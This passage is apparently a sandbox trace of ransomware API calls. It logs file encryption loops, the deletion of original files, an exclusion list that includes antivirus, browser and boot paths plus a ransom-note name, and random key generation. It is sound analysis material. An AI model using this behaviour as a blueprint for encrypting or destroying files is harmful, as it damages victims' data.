returned 1 [0144.691] GetLastError () returned 0x0 [0144.691] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.691] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.691] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.691] GetLastError () returned 0x0 [0144.691] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.691] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.691] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.691] GetLastError () returned 0x0 [0144.691] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.691] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.691] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.691] GetLastError () returned 0x0 [0144.691] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.691] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.692] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.692] GetLastError () returned 0x0 [0144.692] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.692] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.692] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.692] GetLastError () returned 0x0 [0144.692] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.692] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.692] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.692] GetLastError () returned 0x0 [0144.692] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.692] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.692] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.692] GetLastError () returned 0x0 [0144.692] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.692] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.692] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.692] GetLastError () returned 0x0 [0144.692] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.692] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.692] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.692] GetLastError () returned 0x0 [0144.692] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.692] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.693] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.693] GetLastError () returned 0x0 [0144.693] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.693] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.693] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.693] GetLastError () returned 0x0 [0144.693] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.693] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.693] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.693] GetLastError () returned 0x0 [0144.693] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.693] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.693] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.693] GetLastError () returned 0x0 [0144.693] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.693] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.693] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.693] GetLastError () returned 0x0 [0144.693] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.734] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat") returned 1 [0144.734] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat")) returned 0 [0144.735] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat" [0144.735] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0144.735] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXA831.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxa831.tmp")) returned 0xa831 [0144.735] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXA831.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxa831.tmp"), dwFlags=0x1) returned 0 [0144.735] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXA831.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxa831.tmp")) returned 1 [0144.736] CryptDestroyKey (hKey=0x9ad478) returned 1 [0144.736] wcslen (_String="OK") returned 0x2 [0144.736] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0144.736] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0144.736] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0144.736] CryptDestroyHash (hHash=0x9ad8b8) returned 1 [0144.736] CryptReleaseContext (hProv=0x8e3880, dwFlags=0x0) returned 1 [0144.736] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0144.736] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*NMCRYPT") returned 0 [0144.736] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*Recovers your files.html") returned 0 [0144.736] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*.exe") returned 0 [0144.736] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*.dll") returned 0 [0144.736] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*.lnk") returned 0 [0144.736] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*.bat") returned 0 [0144.736] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*.ini") returned 0 [0144.736] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*.msi") returned 0 [0144.736] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*.scf") returned 0 [0144.736] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*pagefile.sys*") returned 0 [0144.736] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*NTUSER.DAT*") returned 0 [0144.736] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*AppData*") returned 0 [0144.736] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*\\winrar\\*") returned 0 [0144.736] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*\\Internet Explorer\\*") returned 0 [0144.737] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*\\java\\*") returned 0 [0144.737] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*\\TeamViewer\\*") returned 0 [0144.737] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*\\windows\\*") returned 0 [0144.737] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*\\ESET\\*") returned 0 [0144.737] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*\\AVG\\*") returned 0 [0144.737] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*\\AVIRA\\*") returned 0 [0144.737] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*\\AVAST Software\\*") returned 0 [0144.737] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*Atheros*") returned 0 [0144.737] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*Realtek*") returned 0 [0144.737] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*bootmgr*") returned 0 [0144.737] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*boot*") returned 0 [0144.737] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*boot*") returned 0 [0144.737] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*CONFIG.SYS*") returned 0 [0144.737] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*IO.SYS*") returned 0 [0144.737] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*MSDOS.SYS*") returned 0 [0144.737] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*NTDETECT.COM*") returned 0 [0144.737] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*ntldr*") returned 0 [0144.737] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*chrome*") returned 0 [0144.737] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*opera*") returned 0 [0144.737] PathMatchSpecW (pszFile="hwrlatinlm.dat", pszSpec="*firefox*") returned 0 [0144.737] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat", pszSpec="*") returned 1 [0144.737] strlen (_Str="NMoreira") returned 0x8 [0144.737] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.737] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.737] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.737] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.737] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.737] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.737] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.737] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.737] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.737] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.737] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.738] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 